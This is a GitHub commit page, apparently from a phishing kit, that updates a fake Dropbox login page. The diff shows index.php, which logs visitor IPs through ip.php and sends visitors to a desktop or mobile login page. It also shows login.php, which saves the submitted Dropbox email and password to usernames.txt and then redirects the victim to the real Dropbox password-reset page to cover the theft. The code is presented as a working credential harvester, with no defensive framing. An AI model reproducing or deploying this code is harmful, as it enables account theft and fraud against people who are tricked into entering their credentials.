Skip to content

Commit f4dc7fc

Browse files
committed
New DropBox Login Page
1 parent e8dbdd7 commit f4dc7fc

File tree

11 files changed

+314
-62
lines changed

11 files changed

+314
-62
lines changed

.sites/dropbox/dropbox1.png

-67.3 KB
Binary file not shown.

.sites/dropbox/dropbox2.png

-1.9 KB
Binary file not shown.

.sites/dropbox/dropbox3.png

-387 Bytes
Binary file not shown.

.sites/dropbox/dropbox4.svg

Lines changed: 0 additions & 24 deletions
This file was deleted.

.sites/dropbox/dropbox5.svg

Lines changed: 0 additions & 11 deletions
This file was deleted.

.sites/dropbox/dropbox6.svg

Lines changed: 0 additions & 4 deletions
This file was deleted.

.sites/dropbox/favicon.ico

4.19 KB
Binary file not shown.

.sites/dropbox/index.php

Lines changed: 9 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,9 @@
1-
<?php
2-
include 'ip.php';
3-
header('Location: login.html');
4-
exit
5-
?>
1+
<?php include 'ip.php';?>
2+
<script type="text/javascript">
3+
if (screen.width <= 699) {
4+
document.location = "mobile.html";
5+
}
6+
else {
7+
document.location = "login.html";
8+
}
9+
</script>

.sites/dropbox/login.html

Lines changed: 188 additions & 13 deletions
Large diffs are not rendered by default.

.sites/dropbox/login.php

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,6 @@
1-
<?php
2-
3-
file_put_contents("usernames.txt", "Dropbox Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND);
4-
header('Location: https://www.dropbox.com/forgot/');
5-
exit();
1+
<?php
2+
3+
file_put_contents("usernames.txt", "Dropbox Username: " . $_POST['login_email'] . " Pass: " . $_POST['login_password'] . "\n", FILE_APPEND);
4+
header('Location: https://www.dropbox.com/forgot/');
5+
exit();
66
?>

0 commit comments

Comments
 (0)